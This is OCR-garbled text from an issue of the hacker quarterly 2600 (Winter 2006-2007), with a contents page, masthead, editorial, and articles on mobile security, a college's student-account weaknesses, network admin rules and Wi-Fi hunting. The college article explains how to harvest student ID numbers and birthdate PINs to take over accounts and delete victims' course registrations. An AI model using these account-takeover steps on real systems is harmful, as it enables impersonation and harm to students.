CATION

Transition . o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o + o o o . o o o o o o o o + o o o + o o o o o o o o o o o + o + o o o o + o + o o o o o o . o o o o o o o o o o + o . o o o o o . o o + o o ..
Mobi l e Devices - Current and Future Security Threats + o o o o . o o o o o o o o o . o o o o e + o o o o o + o o o o o o o o o o o o o o o o o .7
FirstCl ass Hacking o o o o o o o . o o o o o + o o o o o o o + o o o o o o o o o o o o o o o o o o o o . o + o o o + o o o o o . o o e o o o o o o o o o . o . o o + o o o o o o o o + o o o o o o o o o 8
Network Administrators: Rul es Rational e + o + o o o o o + o o o o o o o o + o o + o + + o o o o o . o o o o o o o o o o o o o . o + o o o o o o o o o o o + o o o + + 9
Wi- Fi Hunting: Basic Tool s and Techniques o o . o o o o o o o o o o o o . o o o o o + o o o o o o o o o o o o o o o o o + . o o o o o o o . . o . + o o o + + o o 11
Tel ecom I nformer o o o o o o o o o o o o o o o o o o o o + + o o o o o e o o o . o o o e o o o o . o o o o o o o o o o o o o o o + . o o o + + o o + o o o o o o o . o + o o + o o o o o o o o o o + 13
Circumventing the DoD's Smart Fil ter. . o o . o o o o o + o o o o o . + o + o o o o o o o o o o o o o o o o o o o o o o o + o o o o + + o o o o o . . o o o o o + o o + o o 15
Al gorithmic Encryption Without Math o o o o o o . o e o o + o o o o o o o o o o o o o o o e o o o o o o o o o o o o o + o . + . o o o o o o o o o o o o o o o o o o o . 16
Red Boxi ng Reveal ed for the New Age + . + o o . + o o . + o + + . + . . o . + + 20
How to Get Around Cabie/DSL Lockdowns o o o o o o o . . o . o o o o o o o o o o o o o o o o o o o o o + o o o o o o + o o o + . o o o o o e o o o o o o o o + .24
Hacker Perspective: Phi l l ip Torrone o o o o o o o o o + o o o o o o o o o o o o o o o o o o o o o o o o o + o o o o o o o o + o o o o o o o o o o o o o . o o o o o o o o o o o o 26
Library Sel f-Checkout Machine Expl oit. . o o o o o o o o o o o o o o o o o o + o o o o o o o o o . o o o o o o o o o o o o o o o o + o o o o o o o o . o o + o o o o .29
Fun with Novel L . o o o o o o o o o. o + o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o + o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o + o o o o . .30
How to Bui l d a Book Safe o o o o o o o o o o o o o o o o o. o o o o o o o o o o o o. o o o o o o o o o o o o o o o o o o o o. o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o .31
Network Programming and Distributed Scripting with newLlSP . . . . . . . . . . . . . . . . . . .. . . . . .. . . . . . . . . . .32
Letters o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o e o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o .34
Techno-Exegesis o o o . o o + o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o + o o o o o o o o o o o o o o o o + o o o o o . o o o o o o o o o + o o o o o + o o o ..2
GasJack - Hij acking Free Gasol ine o o o o o o o o o o . o o o o o o o o o o o o o o o o o o + o o + o o o . o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o o .4
Motorol a I Mfree as a Wirel ess iTunes Remote o o o o o + o o o o o o + + + . o o o . o o o o o . o o + o e o o o o o . o o o o o o o o o o + + o o o o o o o o ..7
The Not-50-Great Fi rewal l of China + . . o + o o o + . o e . e + o o o o o + . o + . o o + + . o o o o .8
Hactivism in the Land Without a Server o o o o - o o o o o o o + o o o o o o o o o o o + o o o o o o o o o o o o o o o o + + o + o o o o o o o o o o o o e . o o o + + o o 60
K7: Free [ for the taking] Voicemail . . o o o o o o o o o o . o o e o o o . o o + o o o o . o o o o o o o o o + o o o o o + . . o o o . o o o . o o o . o o o o o o o . o o o o 61
Marketpl ace o o o . o o . . o o . o o o + + + o o o o + o o o o o o o o o o + o o o o o o o o + o o o o o o o o + o o o o o o o o o o o + o o o + o o o o o o o o o o o o + o o o o o o o o + o o o o o o o o o 62
Puzzl e o o + o o o o o o o o o o o o o o o o o o o o o o o o o o o + o o o + e o o o o o o o o o o o + o o + o o . + o o o o o o o o o + + o + o . e o o + + o + o o o o o + o o o o o + + + o o o o o o o o e + o o + 64
Meeti ngs o o o o o + + o o o o o o o o + . o o + + o e o o o o o o o o o o o . . o + o o o o o o . + . + o o o o e o . o o . o o o o o o o o + + + o + + o o o o + o o o o o o + o o o + o o o o o o o o + o o o + o + 66
lilt has become appallingly obvious that our technology
has exceeded our humanity Alber Einstein
S1AF
Editor-In-Chief
Emmanuel Goldstein
Layout and Design
ShapeShifter
Cover
Frederic Guimont, Dabu Ch'wald
Ofice Manager
Tampruf
Writers: Bernie S., Billsf,
Bland Inquisitor, Eric Corley, Dragorn,
John Drake, Paul Estev, Mr. French,
Javaman, Joe630, Kingpin, Lucky225,
Kevin Mitnick, The Prophet, Redbird,
David Ruderman, Screamer Chaotix,
Sephail, Seraf, Silent Switchman,
StankDawg, Mr. Upsetter
Webmasters: Juintz, Kerry
Network Operations: css
Quality Degradation: mlc
2(ISSN 0749-3851, USPS # 003-176),
Winter 2006-2007, Volume 23 Issue
4, is published quarerly by 2600
Enterprises Inc., 2 Flowerield, Sf.
James, NY 11780. Periodical postage
rates paid at St. James, NY and
additional mailing ofices. Subscription
rtes in the U.S. $20 for one year
PO
S
TMA
S
TER: Send address
changes to 2600, PO. Box 752,
Middle Island, NY 11953-0752.
Copyright (c) 2006-2007
2600 Enterprises Inc.
YEARLY
S
UB
S
CRIPTION:
U.S. and Canada - $20 individual,
Broadcast Coordinators: Juintz. thai
IRC Admins: koz, SJ, beave,
carton, rOd3nt, shardy
Inspirational Music: Ride,
The Frank & Walters, Focus.
Harry Gregson-Williams, Jean Leloup.
Jah Wobble, Asian Dub Foundation.
Nilsson, Flotsam & Jetsam (original)
Shout Outs: Steve Rambam. Rick
Dakan. Mitch Altman, Mike Aiello.
DerEngel, No Starch, Prometheus,
Stevens Institute. Montreal 2600
Back issues available for 1984-2005 at
$20 per year, $26 per year overseas
Individual issues available from 1988 on
at $5.00 each, $6.50 each overseas
ADDRE
SS
ALL
S
UB
S
CRIPTION
CORRE
S
PONDENCE TO:
2600 Subscription Dept., PO. Box 752,
Middle Island, NY 11953-0752 USA
(subs@2600.com)
FOR LETTERS AND ARTICLE
S
UBMI
SS
ION
S
, WRITE TO:
2600 Editorial Dept., PO. Box 99,
Middle Island, NY 11953-0099 USA
(letters@2600.com, articles@2600.com)
$50 corporate (U.S. Funds)
2 Ofice Line: +1 631 751 2600
Overseas - $30 individual, $65 corporate
2 Fax Line: +1 631 4742677
-P
g
e 4 2600 Ma
g
azine
Trans
I t ' s been a soberi ng period recently i n the
world of publishing. All around us we hear
gloomy tidings of the condition of the i ndustry
and its prospects for the future. We' ve been
saddened to witness the demise of some
other pri nted publications as their expenses
became too much for them to bear. The alter
native voices always seem to be the first ones
affected while those i mmersed i n the world of
advertisi ng and all things commercial seem to
weather the storms and survive the challenges.
Money i n abundance tends to make such
things possible.
Our mission has always been to provide
,
information and provocative thought without
bei ng tainted by the wanton commercializa
tion that afflicts so many. As we come to the
end of our 23 rd year, we' re both amazed that
we were able to pull it off and confident that
we can conti nue to fulfill this purpose i n the
years ahead. We are unique i n the publishing
world and so is our audience. And since our
subject matter is mostly about i ndividuality,
challenging the status quo, and figuring out
the exception t o the rules, this all ties together
rather nicely.
But we too have faced some daunting chal
lenges i n recent months and they have resulted
in some painful decisions for us. Despite
our u nique position, we still feel the afects
of trends and right now the trend is a down
turn for anyone i n the publishing busi ness.
As mentioned, this mostly afects the small
publishers since they don ' t have much to fall
back on. large publishers can jack up adver
tising rates, lay of staff, and even merge with
other publications without missing a beat. To
them it' s merely a busi ness decision. But for
noncommercial publishers it's a bit trickier.
Distributors only pay publishers for issues
sold. The rest are destroyed at the publishers '
expense. The bigger bookstores and newsstands
can often thrive by providing alternatives to
whatever is not selling at the moment, even if
that means cutti ng back on books, magazines,
and newspapers. I n that section of the industry,
the i ndependent retailer feels it the hardest. I n
a parallel t o t he small publishers' problems,
small bookstores all over the country have felt
the pressure and are increasingly falli ng victim
to the huge chains which now dominate. It's a
sad situation, one which we see repeated in so
many different ways in our society.
We have a great advantage in that our audi
ence is already cl ued i n to a great deal of this
and understands the val ue of a pri nted publica
tion such as ours. Ironically, the very people
who understand technology and the I nternet
on a level far exceedi ng the norm are the same
people who still val ue ink on a page and the
power of the printed word, somethi ng that is
mostly lost i n the world of the net. So while
we certainly feel the affects of what has been
happening in the world of publishing, we thi nk
we'll be able t o weather t he storm, assumi ng
that ' s what our readers want.
I n the end that ' s really what it' s all about.
If we cease being relevant to our readers, our
existence comes to a conclusi on. This is how
it should be. In fact, we believe there would
be a lot less commercial publications for that
very reason if they weren' t doing so well on
the advertising front. We don ' t have that l uxury
nor do we want it. A publication should exist
enti rely to serve its readers. We hope we
conti nue to achieve that goal. Your vote deter
mines whether or not we do.
We also hope our modest price i ncrease on
the newsstand won ' t be a hardship. I t' s our first
one i n quite a while and we avoided it as long
as we could. We can' t ignore the rising costs
around us and the i ncreasing challenges of the
Winter 2006-2007Pge 5
marketpl ace. However, we have al so moved store thefts come from peopl e who work in the
forward with a pl anned increase i n pages and stores. ) In extreme cases, anyone (empl oyee or
as of this issue we have four more of them.
customer) can decide they don ' t l ike us and
We have not changed the subscription price
pitch al l of our issues i nto the trash.
and i t remains what i t has been for more than
I n t he past, a maj or cause of shri nk was the
15 years. We've al so l owered the newsstand
fai l ure of the cashier to properl y enter the sal es
price i n Canada to reflect more accuratel y the
data i nto the computer. Sometimes the bar
currency conversion there.
code wou l dn' t scan properl y and a generic sal e
This is onl y one step we' ve been forced
that didn' t have the publ ication ' s name woul d
t o take i n order t o deal with al l of t he chal -
be processed instead. This meant that there was
l enges thrown our way. We have had to change
no actual record of the magazi ne being sol d
printers for t he first time in 20 years, a move
even though the store col l ected the money.
we resisted when we cou l d aford to. I t's a very
We' re tol d that such a scenario is now i mpos
sad fact but sometimes a business decision has
sibl e. We find that extremel y hard to bel ieve.
to supersede l oyal ty and tradition. I n this case,
The main probl em, though, is that this
the onl y al ternative woul d have been cutbacks
and price i ncreases that i n our opinion woul d
pol icy is horribl y unfair t o publishers. By this
have been unfair to our readers.
l ogic, if we were to buy a book at Barnes and
From our perspective it certai n l y seems
Nobl e and someone stol e it from us afterwards,
as if an undue amount of the burden comes
we coul d hol d the bookstore responsibl e. I t
t o rest on publ ishers which i n t urn causes so
goes agai nst al l common sense. The only way
many of them to cease what they do. Over the
publ ishers shoul d be hel d l iabl e for missing
years we' ve seen a l arge number of distribu-
issues is if they somehow have the power to
tors col l ect money from bookstores and fai l to
do something about it. We' ve offered to send
pay the publ ishers who sent them the maga-
in our own security peopl e to various stores
zines in the first pl ace. The distributors then
to stand guard over copies of 2600 to ensure
decl are bankruptcy and the publ ishers never
that none disappeared. (We natural l y woul d
get paid. This scenario seems t o pl ay out on a have to watch them after the store cl osed as
year l y basis somewhere and each time it does, wel l to prevent empl oyee thef. ) No store has
a few more i ndependent voices are si l enced yet agreed to this.
for good. We' ve al so seen many chai n outl ets Don ' t get us wrong - Barnes and Nobl e has
go under and fai l to pay their debts, causing
been a great resource i n getting our magazi ne
the same trickl e-down efect. I n addition t o al l
out t o the public and we' re thri l l ed t o be on
of this, we must frequentl y accept terms and
their shel ves. But we're al so compel l ed to
conditions that go agai nst common sense and
speak out when somethi ng does n' t seem quite
are seemingl y designed to put the publisher at
right, whether it's an issue l ike this or a secu
a disadvantage.
rity hol e in a computer or phone system. I t ' s
A good exampl e of this is something known
what we do and it's what conti nues to make us
as "shri nk pol icy" i n Barnes and Nobl e, the
unique. And, i n this case, not saying something
l argest bookstore chai n i n the United States.
coul d hel p this pol icy to become the norm i n
Shri nk is t he i ndustry term for issues that cannot
al l bookstores, somethi ng which once again
be accounted for after being delivered to the
woul d hurt the smal l publ ishers far more than
store. This pol icy actual l y forces publ ishers to
the big ones.
pay a significant portion for these issues, as if
they were somehow responsibl e for them. The
Al l in al l, we thi nk we' re going to be in pretty
thi nking - as far as we can tel l is that if copies
good shape once we get t hrough the woods.
of your publ ication are being shoplifed, it' s the
I n the next issue we' re pl anning on i ncl uding
fau l t of your readers and therefore your respon-
a survey form for subscribers so we can al l
sibil ity. But this doesn' t take i nto account a
pl an for the future and l earn from the past. We
number of things. I ssues can get l ost in a store
l ook forward to embarking on more fun proj
for a number of reasons such as misfil ing or
ects i n the future invol ving publ ishi ng, HOPE
accidental destruction. They can al so be stol en
conferences, fil ms, radio, new technol ogy, etc.
by store empl oyees themsel ves. ( I ndustry
And, of course, controversy. We hope you al l
surveys have found that more than hal f of
conti nue to be a part of it.
Pge 6 2600 Magazine
-
by Toby Zi mmerer phones for web access, messaging, and purchasing
This article will focus on a system that many goods directly from their mobile phones long before
people utilize every day. Yet they are oblivious to the the u.s. market started to offer these services. Mobile
power of the threat that they are exposed to. That phones can retrieve an IP address from their mobile
system is your mobile phone. The advent of smart service provider, which provides full access to the
phones and POAs has spawned a new security hole Internet to transmit http, SMTP, SSH, tel net, and other
that the majority of people completely ignore. Most TCP/UOP functions.
mobile phones can access the Internet and have Most devices are now equipped with Bluetooth
Bluetooth communication systems for linking other to allow the user to connect to their laptops, wire-
devices without the use of cables. Additionally, smart less headsets, or other mobile devices. Bluetooth
phones are utilizing Linux and Windows operating has a transmit radius of approximately 30 feet and
systems and have the processing capabilities of a can be configured to allow other devices to find or
small computer. Since these devices do not have a "discover" the host device. Open Bluetooth channels
built in firewall and provide multiple open commu- broadcast a lot of information, including the MAC
nication channels, it becomes perfectly clear that address, device name, and device model. I saw a
mobile phones pose a prime target for attacks. demonstration at the Interop show in Las Vegas this
Mobile Devices and Operating Systems year where the vendor was listing all of the Bluetooth
Smart phones are currently using two operating connections that were currently open near their
systems (Symbian and Windows Mobile 5) that booth. On average, there were 60 open Bluetooth
are customized to each cellular provider's mobile connections near the vendor's booth and they were
device. Symbian (http://www.symbian.coml) is a able to retrieve the device name and model device.
lightweight Linux operating system that is bundled As a test, I switched on the Bluetooth connection on
with a number of applications that can allow a user my phone, disabled the discover feature, and my
to work on the road without the use of a laptop. device was detected.
Microsof has taken their lightweight Windows OS If you are interested in performing some Blue-
that was originally developed for the iPq and into tooth vulnerability scanning, I would recommend
the cellular provider market by developing Windows checking out BTScanner by PenTest (http://www.
Mobile 5 (http:/www.microsof.com/windowsmo -pentest .co.uk/), which runs on a desktop system, or
-bile). Microsof ofers a complement of applica- Blooover (http://trifinite.orgitrifinite_stuf_blooover.
tions to allow a user to work remotely without the -htm!), which runs on your handheld device.
use of a laptop. Current and Future Mobi le Threats
For those of you not familiar with smart phones, Mobile device viruses began to show up in 2004
I would suggest looking at the websites for Symbian with the release of the Cabir virus. Since then, the
and Microsof Mobile in order to see the mobile number of viruses has grown exponentially, which
devices that are currently supported. As I mentioned has resulted in both financial and hardware loss.
earlier, smart phones have the processing capabili- The Skulls and Onehop viruses are designed to
ties of a small computer. These phones are normally completely disable the mobile handset, whereas
equipped with 64MB to 128MB of memory and can the CommWarrior virus will start to transmit SMS
be expanded up to 2GB of additional memory by messages to everyone in your address book, resulting
adding a mini SO memory card to the phone. Some in additional costs on your phone bill.
smart phones have integrated keyboards and touch These viruses currently propagate through two
screens that allow you to quickly navigate through mediums: SMS and Bluetooth. The CommWar-
menus and enter information. I own a Nokia 9300 rior virus shows up as an SMS message with an SIS
that flips open to give the user access to a 1" x 4" attachment . If the user activates the attachment,
high resolution LCD, a 66 button keyboard, and a the mobile phone will become infected. Bluetooth
thumb mouse. viruses, such as Cabir, broadcast a message with an
Open Communication Channels attachment to all Bluetooth devices in range. Once
Mobile service providers have expanded their again, if the user activates the attachment, the phone
services to provide users with greater access in will be infected.
information through their mobile phones. People As I had mentioned earlier, mobile devices are
in Europe and Japan have been using their mobile now retrieving IP addresses and run compact oper-
Winter 2006-2007Pge 7
ating systems to provide the user with all the features a number of mobile service providers. I will let you
and functions of a desktop system on their mobile make your own decision on which route to go. Addi-
devices. These systems do contain software flaws tionally, I would scan your open Bluetooth connec-
and holes that will eventually get exploited through tions to see how many open connections you have.
the open Internet channel on the devices, leaving Finally, and most importantly, educate yourself and
the users vulnerable to attacks. As of March, the first those around you. Most of the current mobile viruses
Java2 ME viruses started to appear. Sooner or later, can be thwarted by deleting the attachment or not
viruses will start to propagate to mobile devices over opening it at all.
the Internet. Mobile devices are the next vulnerable resource
Defending Against Mobile Treats on the market today and will eventually be targeted
Currently some software companies are offering by viruses that spread across multiple communication
anti-virus and firewalls for mobile devices. I would channels. As the complexity, features, and processing
recommend doing some research on the different power of the mobile devices increase, they will
vendors to see which companies support the broadest provide a prime avenue for malware to exploit . By
range of mobile devices and operating systems. I protecting your mobile devices with anti-virus and
know one company has been designing mobile AV/ firewalls, as well as disabling unnecessary services
firewall solutions for a number of years and has a such as Bluetooth, you can protect your network and
pretty distribution throughout the world with yourself from current and future threats.
---------------
by Cristian
service to view our grades with more details (class
The idea to write this article came from reading
averages, graphs, etc.), pay our student fees for the
this magazine for a while. I noticed that lots of people
semester, get a tax receipt for being a student, or
were writing in about the (in)security of the place they
change our home address and phone number. Lastly,
were studying in. Having read all these articles/letters
we use the SID to be able to make our schedules a
very thoroughly, I decided to look into the security in
couple of weeks prior to the semester starting. The
the place I go to study. I go to an English CEGEP,
system is phone based, so you simply call and follow
which is basically a hybrid of year 12 in school and
the instructions given to log in.
the first couple of years of university. When you first
Vulnerabilities
enroll into the CEGEP you are given a student ID
Te Birthdate
card which has a magnetic strip, your picture, and
There are various vulnerabilities in the system, so
your student ID number. The magnetic strip contains
I will go in the order I discovered them. Upon your
the SID number too, as well as a "charge" of $4.00
first entry to the college, they tell you that your pin (to
CDN in order to be able to print in certain computer
be used in FirstClass, "For Students Only, " OmniVox,
labs throughout the campus. Using a combination of
and course registration system) is your birthday, in
methods, we will obtain both the SID number and
the form of DDMMYY including the Os if the day
the corresponding password, thereby showing how
or month has it. Social engineering, anyone? If you
vulnerable this system really is. This of course should
are able to engage a conversation with someone, it
be taken as an educational guide and not to be used
should be quite easy to obtain their date of birth. Even
for your own gain.
worse, the CEGEP I attend is chock full of people
Te Student 10 Number
who use the infamous MySpace.com website, so
The student ID number is used to log into your
even if they don't tell you their date of birth, asking
FirstCiass (www.firstclass.com) account, which is
them for their MySpace page is another option.
the piece of sofware used all over the campus for
Simply looking at their description may reveal this
pretty much any class related tasks. We use First-
bit of information or, if not, look at the comments
Class for everything, from viewing our assessments
other people leave. There might be messages wishing
to communicating with the teachers. Teachers, on
a happy birthday and then you can deduce the date
the other hand, use it to actually put our grades into
of birth of the person.
the system, calculate class averages, etc. We also use
Te Student ID Number
this SID to log into our "For Students Only" section
Knowing the birth date is only half the informa-
where it shows us all our grade history, our current
tion we need since the SID number is the next impor-
schedule for the semester, our CRC score (a sort of
tant part . The SID number is seven digits and has
GPA), and a couple of other features. It is also used
the format YYXXXXX, where YY is the year you first
for the OmniVox service. We use this web-based
enrolled into the CEGEP and the remaining Xs are
Pge 8 2600 Magazine
generated at random (to my knowledge). Finding
.
this
number is quite easy and there are actually various
ways to find it.
For one thing, everyone must carry their SID card
inside the campus or they will be kicked out by the
security guards as well as fined $50 CDN. Again,
social engineering can be applied here and simply
asking someone you know to show you their ID card
to see how goofy they look in their picture will give
you full access to the SID, so memorizing it shouldn't
be that big of a problem.
Another way to find it is by looking in the recy
cling bins. The students over here print like crazy, and
in all essays/lab reports, etc. you must provide your
name and SID number so the teacher can then input
the grade into the FirstClass system. Usually you can
find old lab reports or pages that have mistakes in
them with the student's name and SID number fully
viewable in the page's header.
The third way to find it is directly via the First
Class system. Upon logging into the system, you
will be greeted by the "Desktop" of your FirstClass
account which has links to your mailbox, address
book, calendar, current semester registration process,
conferences, uploaded files, help, news, and student
body forum. To your left you have the FirstClass menu
system, which has links to logout, who's online in
the system at the time, instant message menu, prefer
ences, and, more importantly, the directory.
The directory is a search engine which takes in
a name (or part of a name) and searches matches
across the student body and the faculty/teachers.
Now if you search for someone (let's say Smith), it
will return anyone with the surname Smith in it (both
student and teacher). Once the matches appear, it
will provide links to their FirstClass shared files
folders. For teachers, this is quite useful since they
can provide class notes, Power Poi nt presentations,
etc. for everyone to download. For students, well,
I haven't met anyone that actually uses that service
yet . The important part here is the list of links that
is provided when a match is found. If the person
is a teacher (let's say we found a teacher named
John Smith), then pointing to the link will provide
an address such as the following in the status bar of
your browser :
http:/ /frstclass . COLLEGENAMEHERE . qc . ca/
"Login/-SMITHJI
There isn't very much to work with in that link,
right? Well, now let's say that the list of matches is
greater than a single result and that at least one of
the matches is a student. If you point to that link, the
status bar will display the following address:
http:/ /frstclass . COLLEGENAMEHERE . qc . ca/
"-yyxxxxxi
Recognize something there? Lo and behold,
the link provides the SID number of the student we
searched for - without even knowing the student in
real life.
It is also worth noting that when you change your
password for the "For Students Only" page, it only
applies to that individual system. Your birth date will
still be the password for the Omnivox, FirstClass, and
phone registration systems. Even worse, in order to
actually change these passwords, you cannot do it
via the actual system. You must physically go to the
IT Administrator's office (which very few students
know how to find) with two pieces of ID in order
to change them. Making it this hard to change a
password is very unreasonable. Students are lazy
and they have work to do. They aren't going to go
through the trouble of finding out where the office is
just to change their password. They'd rather just keep
it as it is and just forget about the potential conse
quences that could happen.
Combining these two pieces of information gives
us literally access to anything related to that partic
ular student. You are able to change their address,
their phone number, and once schedule-making time
comes, you can easily delete all his/her courses and
have him/her be charged $50 CDN for registering
late, as well as leaving an empty spot in the classes
he/she took (which, if you need that course, can be
taken by you).
It's very surprising that they have such an elab
orate system for managing your stay at the CEGEP,
but it can be very easily bypassed with a few simple
clicks and a little bit of social engineering. Even worse
is the terrible method that they have to perform a
simple task like changing a password. If you ask me,
it's a small ce to for your
ctc|^Jm.o.-t~tc-.
:R(c@
by The Piano Guy
article with a bit of fear and trepidation. Though
When I wrote my article "Network Administra-
didn't think this was what I was doing in reality, I felt
tors: Why We Make Harsh Rules" (22:4), my purpose
like I might be perceived as "the other side," rather
was to explain what seemed like, to some, capricious
like Hamas writing into the Jewish News to explain
rules that some network administrators hand down.
their actions.
I did it in reaction to a student (Luke) who ran afoul
The next issue had an attack letter implying that
of the rules and was being taunted by a stupid and
my article was stupid and that I should just stop
unprofessional network administrator. I wrote the
whining and "do my job." The editor of 2600 chal-
Winter 2006-2007P e 9
lenged the letter's author, explained why I wrote cause a problem, then we probably weren't going
it, and why they published it. Frankly, I thought a to even notice. He somehow makes the leap that
former employee of ours sent in the letter. I write like we expect people are going to have to break the
I talk, he reads and writes for this magazine, and he's rules to get their jobs done, so we set the expecta-
certainly smart enough to figure out that I authored tions high knowing the people aren't going to follow
the original article. If my hunch is right, the man is them. Maybe kaigeX has never had to deal with a
stunningly brilliant with computers. He certainly had legal department. Surely he can use some clarifica-
more technical skills than most, including me. He tion about how and why I do things. The purpose of
didn't, however, work in my department, didn't like the network is so people can get their work done.
me, and I don't know why he was fired, other than to Everything we do derives from that basic premise.
know that I had nothing to do with it. No one ever has to break a rule to get his or her
Three months later, kaigeX wrote a thoughtful job done - period. This is so true that if something
rebuttal article. Though he took me to task, he mostly comes up requiring a user to break a rule to get their
agreed with more than half of the rules that the other job done, we either find a different way or change
system administrator handed down for me to enforce. the rule, which covers Number 9 (no hacking) . This
A well-reasoned response deserves a well-reasoned also covers Number 2 (no one connects devices
rebuttal. To clear the air, I'm going to review the without permission) because if they need it for their
points he made about the points in my article. If you job they have permission. It covers Number 3 (no
can't follow all of this, do remember that 2600 does one installs their own software) and Number 8 (no
sell back issues. copyright infringement) . If they need it, we buy it for
His interpretation of my rules was in essence them so we're legal, and support it. Unlike where
"we make harsh rules to make our lives easier and/ kaigeX has been, we are 100 percent legally licensed
or to protect ourselves." He didn't think this was for everything. In fact, that was the main reason why
legitimate. I don't exactly agree with his interpreta- my predecessor was fired - he didn't see a need to
tion. If I had to boil this down, I would say that we be 100 percent legal. And peripherally, it covers
make harsh rules to keep the network usable for all Number 5 (no chat software). We encourage people
people so they can get their jobs done and to protect to use their mail clients as if they are chat clients. It's
the employer (owner of the network) from massive almost as fast and this leaves an audit trail for them
expenses in repairs and/or from legal action from to refer to later (in their Sent Items).
outside entities. Do note that I'm not offering "so they Further, we try to strike a balance between
can manage their personal lives better (Le., checking being a police state and being open to lawsuits.
your Gmail or doing your banking online) ." The We could strictly enforce Number 1 (business use
purpose for providing computers in the first place is only) and Number 10 (no expectation of privacy),
to facilitate work. That's why the owners pay for the but that would be highly stupid and counterproduc-
network, and for me to run it. When put that way, the tive. It would take a lot of time and resources, and it
emphasis changes.
would irk people to no end. However, let's say that
He didn't think that our library computers were someone does something really stupid, like surf for
secured at all, thus unfit for use by him. I don't think kiddy pam while at work (which happened where
that's what I said, and I'm certain that's not what I I was employed in 1991). We need legal grounds to
meant. They are secured. They are on a diferent
look for it if we suspect something, or handle it if we
network (good question to ask, kaigeX). They aren't
find it by accident . We also need legal protection so
as restricted and are perfectly useful for web mail we can terminate this employee without being sued
when employees are on break.
by them. In this extreme example, a law was broken.
He thinks the "hard rules" cause a loss of produc- So heaven forbid it if ever happens to us, we would
tivity. The opposite is true. So is my emphasis. In
need legal protection to turn in evidence against
fact, it is my job to find ways to improve processes
them to the police.
to make people's work easier. Sometimes that means Onto other points. KaigeX's disagreement with
writing a Crystal Report or some SQL code. Some-
my Number 4 (no outside email clients) goes against
times that means buying, installing, and supporting
productivity for work and also puts my network at
specialized software on a user's computer. And yes,
risk. It also causes political problems in the work-
sometimes that means opening up services on the
place. My brilliant former coworker (BFC) is more
network just for a certain department . Whatever it is,
than smart enough not to bring in viruses via his
it is my job to serve.
outside email usage, but his ignorant department
Now, if I'm constantly chasing down viruses and/
director (100), two management levels above him,
or spyware, dealing with user complaints about how
is computer stupid. If BFC has the "right" to check
slow the network is, or spending time in depositions
his email, how am I going to deny this to IDO? If I
answering questions about copyright infringement
do deny it, what's to prevent 100 from demanding
by one of my users, I won't have time to find new
that BFC set this up for him, even if I've said not to?
efficiencies, let alone implement them.
Nothing. Also, if BFC sets it up, I have no way to
The comment I made that bothered kaigeX the
block attachments from coming in for 100 to open
most was that if someone broke a rule and it didn't
up (a workaround that kaigeX suggested), taking my
P
g
e 10 2600 Ma
g
azine
network and the workstati ons on i t to DOA.
Remember fol ks, I di dn't wri te these rul es. I was
handed these rul es to enforce, and I do. I al so have
to fol l ow them, i f not for safety reasons, then for
pol i ti cal reasons. If I broke a rul e I am supposed to
enforce and di d seri ous damage to the network as
a resul t, the person they hi red to repl ace me woul d
be the one t o cl ean i t up. Lastl y, I 've al ways hel d the
perspective that one t hi ng worse than a hypocri te i s
bei ng one.
More or l ess, kai geX agreed wi th every other
poi nt I made. He di dn't necessar i l y l i ke that he had
to agree wi th me, but apparentl y i t didn't occur to
hi m that I don't necessar i l y l i ke to have to take a
posi ti on ei ther.
Lastl y, kai geX made one bl atant fact ual error.
He feel s that I am at ri sk because of my Wi n2 K
workstati ons not getti ng security patches. Go to
http://s upport . mi crosoft . com/l i fecycl e/? p 1 =72 74
and http://support . mi crosoft.com/gp/l i fecycl e ( unl ess
Mi cro$oft changes the pages) . They make clear that
securi ty patches are provi ded through 7/1 3/201 0. By
that date al l of my 2000 machi nes wi l l be l ong reti red,
and my empl oyer wi l l probabl y have a combi nati on
of XP Professi onal and whatever i s newer than that
for the desktop.
Shouts out to kai geX (for a reasoned rebuttal ) and
the anonymous network admi ni strator who both set
these rul es we're di scussi ng and taught me a l ot over
the l ast years of worki ng with hi m.

W| NUHHg
5 dH0 6C|HU65
by Rick Davis
More Gear - Basic Software
From war-wal ki ng to war-dri vi ng the art of fi ndi ng
Get fami l i ar wi t h your OS' s bui l t i n functi on to
wi rel ess connecti ons has become a game for a new
connect wi rel essl y because that can be used i n many
mi x of computer users. Fi ndi ng new techni ques cal l s
cases and i s usual l y a qui ck way t o connect. For
upon knowl edge in antenna desi gn and si gnal theory
exampl e, Wi ndows XP users can si mpl y ri ght-cl i ck
al ong wi th vari ous aspects of computer hardware
the i con in the system tray to open the connecti ons
wi ndow whi ch wi l l di spl ay any avai l abl e networks.
and sofware. Someti mes though these hi gher l evel
I n addi ti on, Network Stumbl er provi des a gol d
techni ques are not reasonabl y used and for many
mi ne of i nformati on and i n many cases may be the
that have not had experi ence wi th them si mpl er
onl y other appl i cati on you need. What thi s does i s
methods need to be empl oyed. Wi th thi s i n mi nd the
gather i nformati on from any si gnal i t fi nds such as
fol l owi ng wi l l expl ore some of the best methods, i n
SSI D, si gnal strength, securi ty, and encrypti on bei ng
terms of cost and ease, t o seek out avai l abl e wi rel ess
uti l i zed al ong with many other features. There are
connecti ons.
many ways to keep the basi c operati ng system from
Get Your Gear - Basic Hardware fi ndi ng a connecti on (such as not broadcasti ng your
At t he most basi c l evel you need onl y a l aptop SSI D) however i f there is a si gnal Network Stumbl er
or other devi ce that can connect to wi rel ess connec-
wi l l noti fy you.
ti ons. I recommend a l aptop s o that you can use some
It's al so worth noti ng that some of these programs
advanced software and several appl i cati ons si mul ta-
seek connecti ons acti vel y whi l e others seek passi vel y
neousl y (see bel ow) . Al so, a wi -fi fi nder i s very useful
and dependi ng on your si tuati on thi s can make
and wi l l make your search qui cker, more produc-
a di fference. Activel y means that your program
t e and much more , ncogn, to These dev ,ces can
i s sendi ng i nformati on i n order to get a response
'v , .
and col l ect data, whi l e a passi ve program trans
be found i n any major el ectroni cs store and range
mi ts nothi ng and onl y col l ects what i s passi ng by.
from $10 to $30. They usual l y have a few LED l i ghts
Pssi ve programs can take much more ti me to l ocate
packaged i nsi de a casi ng about the si ze of any other
connecti ons and wi l l usual l y not detect a l l avai l abl e
pocket el ectronic devi ce. Al though t hey al l have
